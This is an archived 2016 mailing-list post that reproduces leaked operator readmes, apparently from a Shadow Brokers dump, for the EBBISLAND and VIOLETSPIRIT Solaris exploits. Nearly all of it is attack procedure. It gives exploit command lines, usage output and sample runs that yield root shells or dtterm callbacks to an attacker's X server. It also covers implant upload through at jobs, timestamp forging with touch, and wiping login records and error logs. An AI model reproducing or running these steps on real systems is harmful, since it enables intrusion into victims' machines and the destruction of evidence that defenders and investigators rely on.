[Dailydave] Just so you don't have to...
Dave Aitel
dave.aitel at gmail.com
Sat Dec 17 09:35:42 EST 2016
I went through the Shadowbroker.zip file they released. It's like, super
old boring crap but the following readme's were mistakenly included it
seems. I'll hit a few enters if you don't want to read it because you have
clearance.
-dave
# as of: 2010-07-29 18:01:21 EDT
# EBBISLAND
# (Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)
# First ensure that the vulnerable rpc service is running. You must
# be able to reach the target system's TCP port that the designated target
RPC
# is listening upon.
# EBBISLAND USAGE.
# ebbisland: (-A <address>) Shellcode address
#
# ebbisland: (-C) /core file overwriter/scrambler. This option throws the
attack, but uses pseudo-random
# binary data in place of the actual shellcode, to produce a
/core file free of suspicious
# content. This would be used in the case where EBBISLAND failed
to successfully exploit the
# target, and the operator wanted to try and "purify" the file
left in /core before quitting.
#
# ebbisland: (-c <procnum>) Procedure number. Defaults to 0.
#
# ebbisland: (-D) For and extra dummy connection
#
# ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
#
# ebbisland: (-M <mtu>) Choose size of data part of packet to send.
Default is 1260. This could effect
# the landing zone size.
#
# ebbisland: (-P <prog>) Optional prog to exec, re-using exploit socket.
#
# ebbisland: (-r <prognum>) RPC program number
#
# ebbisland: (-s <source port>)
#
# ebbisland: (-V) Provides verbose outputs, where appropriate and desired.
#
# ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for
others
#
*********************************************************************************************
mx
:%s,SERVICE_TCP_PORT,SERVICE_TCP_PORT,g
:%s,TARGET_RPC_SERVICE,100026,g
:%s,TARGET_IP,TARGET_IP,g
:%s,SPECIFIC_SHELLCODE_ADDRESS,SPECIFIC_SHELLCODE_ADDRESS,g
`x
# Scanning:
-scan brpc TARGET_IP
# Redirector:
-tunnel
l SERVICE_TCP_PORT TARGET_IP
# Exploit:
# ./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
./ebbisland -t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X -N -A
SPECIFIC_SHELLCODE_ADDRESS
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
**********************************************************************************
Exploit will provide ROOT shell access via same tunnel/session (no
callback, no listen).
# EXPLOIT WINDOW
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
which uudecode uncompress at
cd /tmp
ls -alrt
mkdir /tmp/.scsi
cd /tmp/.scsi
pwd
ls -lart
# Usual method of running NOPEN fails with EBBISLAND
# we use an at command to do so.
# NORMAL LOCATION FOR AT FILES
ls -lart /var/spool/cron
ls -lart /var/spool/cron/atjobs
# PRESERVE THE DATE FROM BEFORE THE AT JOB
touch -r /var/spool/cron/atjobs x
# LOCALLY
packrat -l
gedit /current/up/sendmail.Z.uu
# EXPLOIT WINDOW
/usr/bin/uudecode; ls -latr
# select all/copy gedit contents into Target exploit window, then:
uncompress sendmail.Z
ls -l
chmod 700 sendmail
# EXPLOIT WINDOW (CREATING AT JOB)
echo "PATH=. D=-ulrandom11111-55555-2 sendmail" | at now
netstat -an | grep random11111-55555-2
# TOUCH THE ATJOBS FILE BACK TO BEFORE TIME
touch -r x /var/spool/cron/atjobs
# VERIFY TIMES FROM BEFORE
ls -lart /var/spool/cron
ls -lart /var/spool/cron/atjobs
# FROM REDIRECTOR
-nstun TARGET_IP:random11111-55555-2
*******************************************************************************
CLEANING.
/core
/var/adm/messages
* The correct EBBISLAND attack for the remote target architecture must be
used, or else the attack will fail.
* Use -C option to clean failures remotely if we never get on.
# Logging considerations: Quite a few log messages will be generated on the
target as each subsequent
# attempt fails, most likely written to the /var/adm/messages file. These
could include messages similar to...
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning]
/platform/SUNW,Ultra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice]
dr_daemon attempting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1:
dr_daemon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon
operating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE:
recovered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning]
/usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:11 target inetd[146]: [ID 858011 daemon.warning]
/usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
Sep 27 14:43:14 target inetd[146]: [ID 858011 daemon.warning]
/usr/openwin/bin/kcms_server: Illegal Instruction - core dumped
Sep 27 14:43:15 target inetd[146]: [ID 858011 daemon.warning]
/usr/openwin/bin/kcms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning]
/usr/sbin/rpc.metad: Illegal Instruction - core dumped
Sep 27 14:43:56 target inetd[146]: [ID 858011 daemon.warning]
/usr/sbin/rpc.metad: Bus Error - core dumped
Sep 27 14:43:57 target inetd[146]: [ID 858011 daemon.warning]
/usr/sbin/rpc.metad: Segmentation Fault - core dumped
-----
mx
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/HOST_NAME/HOST_NAME/g
:%s/DOMAIN_NAME/DOMAIN_NAME/g
:%s/RAT_NAME/RAT_NAME/g
:%s/RHP-22/RHP-22/g
:%s/RHP-23/RHP-23/g
:%s/RHP-24/RHP-24/g
:%s/WORK_DIR/WORK_DIR/g
`x
### If ratload fails, use doubleT
# wrap-telnet.sh -l REDIRECTIP -p RHP-22 -s RHP-23 -x RHP-24
# xc -x REDIRECTIP -y RHP-24 -s REDIRECTIP 127.0.0.1
# doubleT -i PITCH_IP -t RHP-22 RHP-23
# -tunnel
# u 177 TARGET_IP
# r RHP-22
# r RHP-23
# r RHP-24
# On redirector - set up nopen tunnel
-tunnel
u 177 TARGET_IP
r RHP-24
r RHP-21
s
######## use ys.auto first which won't require you to start separate xc
command
######## selects random ports for you
######## brings up scripted packrat window
######## gives pastable -tunnel commands if redirecting
######## examples:
#### ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -d /tmp/.dir
#### ys.auto -i 10.0.3.1
#### ys.auto -i TARGET_IP -l REDIRECTOR_IP
#######<ctrl><c> or <ctrl><d> on nc window first, then delete all pop-ups
#Local window1
./wrap-sun.sh -l PITCH_IP -r RAT_NAME -p RHP-21 -x RHP-24 -d /tmp/WORK_DIR
#hit return
# type y and hit return
#Local window2
# for redirection local ip is redirector ip
./xc -s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP
#hit return
#hit return
#hit return
#(At this point you should see a continue.... in your attack1 window
#in the attack1 window
#hit return
#hit return
#hit return
#(you should see your upload happen...)
#Ctrl-C your nc window
#Ctrl-C your xc window
#w/o tunneling
../bin/noclient TARGET_IP
#w/ tunneling. In redirector window
-nstun TARGET_IP
##### If ratload fails, use doubleT
# wrap-telnet.sh -l REDIRECTIP -p RHP-22 -s RHP-23 -x RHP-24
# xc -x REDIRECTIP -y RHP-24 -s REDIRECTIP 127.0.0.1
# doubleT -i PITCH_IP -t RHP-22 RHP-23
# -tunnel
# u 177 TARGET_IP
# r RHP-22
# r RHP-23
# r RHP-24
##### otherwise continue
-rm RAT_NAME
##### Cleaning up ######
ps -ef |grep dtlogin
# You should see a recent one : mine was
kill -9 DTLOGINPORT
ps -ef |grep dtlogin
-ls -t /var/dt/
# you will notice Xerrors is the most recent
-tail /var/dt/Xerrors
# if your entries are the only ones there....
cat /dev/null >/var/dt/Xerrors
# if there are other entries you will do something like
wc -l /var/dt/Xerrors
subtract the number of lines that are because of you from above
head -(what's left) > t ; cat t
if it looks good:
cat t >/var/dt/Xerrors
-rm t
-ls -t /var/adm
#anything that has a resonably current timestamp you should check
#toasting the login entries.....
# Target window
-put ../up/toast t
### TO VIEW...
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
./t -l /var/adm/lastlog | tail
### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
--------------------------------------------------------------------------
VIOLETSPIRIT can be used against versions 4 and 5 of the "ttsession"
daemon found in the Common Desktop Environment (CDE) Solaris 2.X, on both
SPARC
and x86 platforms. As of this writing (21 May 2003), it has been
successfully
tested against...
Solaris 2.6 SPARC ("ttsession" version 4)
Solaris 2.6 x86 ("ttsession" version 4)
Solaris 2.7 SPARC ("ttsession" versions 4 and 5)
Solaris 2.7 x86 ("ttsession" versions 4 and 5)
Solaris 2.8 SPARC ("ttsession" version 5)
Solaris 2.8 x86 ("ttsession" version 5)
Solaris 2.9 SPARC ("ttsession" version 5)
Solaris 2.9 x86 ("ttsession" version 5)
The VIOLETSPIRIT exploit, if successful, sets up a "dtterm" terminal
connected to an X server of your choice over a TCP connection. VIOLETSPIRIT
can also be redirected via various redirection tools.
Platform-specific run-time instructions can be found below. I give
1 example for a version 4 exploit, and 1 example for a version 5 exploit, as
they involve slightly different processes. A version 4 exploit involves
just
an attack, while a version 5 involves a bit more...
=============================================================================
=============================================================================
(Solaris 2.6 SPARC target, "ttsession" version
4)............................
###### Are they vulnerable???
$ rpcinfo -p 555.1.9.56
.
.
.
1342177279 4 tcp 32786
1342177279 1 tcp 32786
1342177279 3 tcp 32786
1342177279 2 tcp 32786
$
## Okay, he looks like a Solaris 2.6 box, running "ttsession" version 4...
##
## What options do we have?
$ ./vs.attack.linux
Please specify tgt IP address and hostname
Usage: ./vs.attack.linux -i tgt_ipaddr -h tgt_hostname -x xserver_port
optional args:
[-c cb_ipaddr] : default use my ip addr
[-p cb_port] : callback port (default random)
[-n tcp_port] : default use portmapper to determine
[-7] use Solaris 7+ default ttsession program number
1289637086(0x4cde4cde)
: default use Solaris 6- ttsession program number
1342177279(0x4fffffff)
[-r rpcprognum] : ttsession program number if different from defaults
[-v rpc version] : default 4 : Solaris 8 and other patched versions use
version 5
[-T seconds] set approx time at which target ttsession started
for version 5 rpc
time is in seconds since epoch
[-t microsecs] refine approx time at which target ttsession started
time is in microseconds
[-q xserver_ip] default <my ip>
$
## For Solaris 2.6, version 4...to display a "dtterm" back to the
## X server at 555.1.2.48:0.0...
$ ./vs.attack.linux -i 555.1.9.56 -h murray -q 555.1.2.48 -x 6000 -n 32786
Client created
rendez ip is set to 555.1.2.48
tgt ttsession is using port 32786
Got from target: TT Session ID: P 01 354 1342177279 1 0 0 555.1.9.56 4
TT Session is using program number 0x4fffffff
TT Session is process id 354 being run by uid 0
continue ...
## VIOLETSPIRIT prompts the user at several points, to establish visual
## verification of the protocol interactions before proceeding to the
## next step. Assuming everything looks okay, just hit the "Enter" key
## at the "continue..." prompt to keep on going...
Got from target: TT Process ID: 1._jhjr
TT session start time 1052162933 Mon May 5 14:28:53 2003
TT pid 1
continue ...
Associate process id
assoc_process_id: starting cookie time at 1052162933 0
port 33721 (0x83b9) bound for listening
Mon May 5 15:42:22 2003
Going for cb accept
Done cb acccept
Your Xserver should be running on 555.1.2.48 port 6000
About to tell the target to create a DT Terminal on DISPLAY
547725836848:67108864.1097364144128
continue ...
## Okay...when you hit "Enter" here, the target will attempt to display
## a "dtterm" back to your prespecified X server...better have one up
## and waiting...
SDT_go_term - got success on cb
SDT_go_term done
0x00000000
0x00000001
>>> BITS 0x01120635
0x01 = 0
STATE = 5 TT_STARTED
0x10 = 1
0x20 = 2
0x200 RESULT = 0
No of args = 00000000
0x00000400 = 00000008
Handler P Type: SDT_Terminal
No of contexts = 00000001
$DISPLAY: 0x00000000 arg type 3 string: 0xffffffff c type 2
"547725836848:67108864.1097364144128"
More data = 00000016
## At this point, after a short delay, you should see a "dtterm" pop up on
## your prespecified X server. Watch the "tcpdump" window...you'll see
## _lots_ of TCP traffic being exchanged between your X server and the
## target...
All done - press return to close down the tcp stream
## Hit "Enter" one more time, for a graceful closeout of VIOLETSPIRIT.
$
=============================================================================
=============================================================================
(Solaris 2.9 x86 target, "ttsession" version 5)............................
###### Are they vulnerable???
$ rpcinfo -p 555.1.3.42
program vers proto port
.
.
.
1289637086 5 tcp 33143
1289637086 1 tcp 33143
$
## Okay, he looks like a Solaris 2.7+ box, running "ttsession" version 5...
##
## First we need to get the times for the magic cookie for the attack to
work
## What options do we have?
## Because the "gettime" binary is uploaded to targets, no usage is ever
printed
## But here are the options:
$ ./vs.gettime.sol.sparc
Please specify tgt IP address and hostname
Usage: ./vs.get.sol.sparc -i tgt_ipaddr -h tgt_hostname
optional args:
[-c cb_ipaddr] : default use my ip addr
[-p cb_port] : callback port (default random)
[-n tcp port] : default use portmapper to determine
[-r rpcprognum]
[-T seconds] set approx time at which target ttsession started
for version 5 rpc
time is in seconds since epoch
[-t microsecs] refine approx time at which target ttsession started
time is in microseconds
## We're now getting the times for the magic cookie. This will take
several minutes ON
## AVERAGE over a fast link, it is STRONGLY discouraged to run this over a
dialup
## connection unless you enjoy staring at slowly printed dots for hours on
end.
## If at all possible, upload this somewhere else and lose the dialup
bottleneck.
## For Solaris 2.7+, version 5...to get the proper times needed for the
attack
$ ./vs.get.sol.sparc -i 555.1.3.42 -h dellosaurus -n 33143
Client created
rendez ip is set to 555.1.2.48
tgt ttsession is using port 33143
Got from target: TT Session ID: P 01 7449 1289637086 1 1 0 555.1.3.42 5
dellosaurus
TT Session is using program number 0x4cde4cde
TT Session is process id 7449 being run by uid 0
continue ...
gss_getinfo returned: 0xffffffff 0xffffffff 0xffffffff
Got from target: TT Process ID: 1._jiOG
TT session start time 1052165648 Mon May 5 15:14:08 2003
TT pid 1
continue ...
## VIOLETSPIRIT prompts the user at several points, to establish visual
## verification of the protocol interactions before proceeding to the
## next step. Assuming everything looks okay, just hit the "Enter" key
## at the "continue..." prompt to keep on going...
Associate process id
assoc_process_id: starting cookie time at 1052165648 0
Mon May 5 16:21:17 2003
port 33733 (0x83c5) bound for listening
.................................................. Mon May 5 16:22:16 2003
.................................................. Mon May 5 16:23:19 2003
.................................................. Mon May 5 16:24:19 2003
.................................................. Mon May 5 16:25:16 2003
.................................................. Mon May 5 16:26:14 2003
.................................................. Mon May 5 16:27:11 2003
.................................................. Mon May 5 16:28:08 2003
.................................................. Mon May 5 16:29:06 2003
.................................................. Mon May 5 16:30:04 2003
.................................................. Mon May 5 16:31:01 2003
.................................................. Mon May 5 16:31:58 2003
.................................................. Mon May 5 16:32:56 2003
.................................................. Mon May 5 16:33:53 2003
.................................................. Mon May 5 16:34:51 2003
.........................
Mon May 5 16:35:20 2003
Good cookie found using times 1052165648 725142
$
## Cool! We found the times to make the magic cookie.
## Let's now see our attack options
$ ./vs.attack.linux
Must specify time values with rpc version 5
Usage: ./vs.attack.linux -i tgt_ipaddr -h tgt_hostname -x xserver_port
optional args:
[-c cb_ipaddr] : default use my ip addr
[-p cb_port] : callback port (default random)
[-n tcp_port] : default use portmapper to determine
[-7] use Solaris 7+ default ttsession program number
1289637086(0x4cde4cde)
: default use Solaris 6- ttsession program number
1342177279(0x4fffffff)
[-r rpcprognum] : ttsession program number if different from defaults
[-v rpc version] : default 4 : Solaris 8 and other patched versions use
version 5
[-T seconds] set approx time at which target ttsession started
for version 5 rpc
time is in seconds since epoch
[-t microsecs] refine approx time at which target ttsession started
time is in microseconds
[-q xserver_ip] default <my ip>
$
## Now, for the attack...
$ ./vs.attack.linux -i 555.1.3.42 -h dellosaurus -n 33143 -7 -v 5 -c
555.1.2.48 -q 555.1.2.48 -x 6000 -T 1052165648 -t 725142
Client created
rendez ip is set to 555.1.2.48
tgt ttsession is using port 33143
Got from target: TT Session ID: P 01 7449 1289637086 1 1 0 555.1.3.42 5
dellosaurus
TT Session is using program number 0x4cde4cde
TT Session is process id 7449 being run by uid 0
continue ...
gss_getinfo returned: 0xffffffff 0xffffffff 0xffffffff
Got from target: TT Process ID: 2._jiOG
TT session start time 1052165648 Mon May 5 15:14:08 2003
TT pid 2
continue ...
Associate process id
assoc_process_id: starting cookie time at 1052165648 725142
Mon May 5 17:19:13 2003
port 33737 (0x83c9) bound for listening
Mon May 5 17:19:13 2003
Good cookie found using times 1052165648 725142
Going for cb accept
Done cb acccept
Your Xserver should be running on 555.1.2.48 port 6000
About to tell the target to create a DT Terminal on DISPLAY
547725836848:67108864.1097364144128
continue ...
## EUREKA!!! When you hit "Enter" here, the target will attempt to display
## a "dtterm" back to your prespecified X server...better have one up
## and waiting...
SDT_go_term done
0x00000000
0x00000001
>>> BITS 0x01120635
0x01 = 0
STATE = 5 TT_STARTED
0x10 = 1
0x20 = 2
0x200 RESULT = 0
No of args = 00000000
0x00000400 = 00000008
Handler P Type: SDT_Terminal
No of contexts = 00000001
$DISPLAY: 0x00000000 arg type 3 string: 0xffffffff c type 2
"547725836848:67108864.1097364144128"
More data = 00000016
## At this point, after a short delay, you should see a "dtterm" pop up on
## your prespecified X server. Watch the "tcpdump" window...you'll see
## _lots_ of TCP traffic being exchanged between your X server and the
## target...
All done - press return to close down the tcp stream
## Hit "Enter" one more time, for a graceful closeout of VIOLETSPIRIT.
$
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.immunityinc.com/pipermail/dailydave/attachments/20161217/2f6a36e8/attachment-0001.html>
More information about the Dailydave
mailing list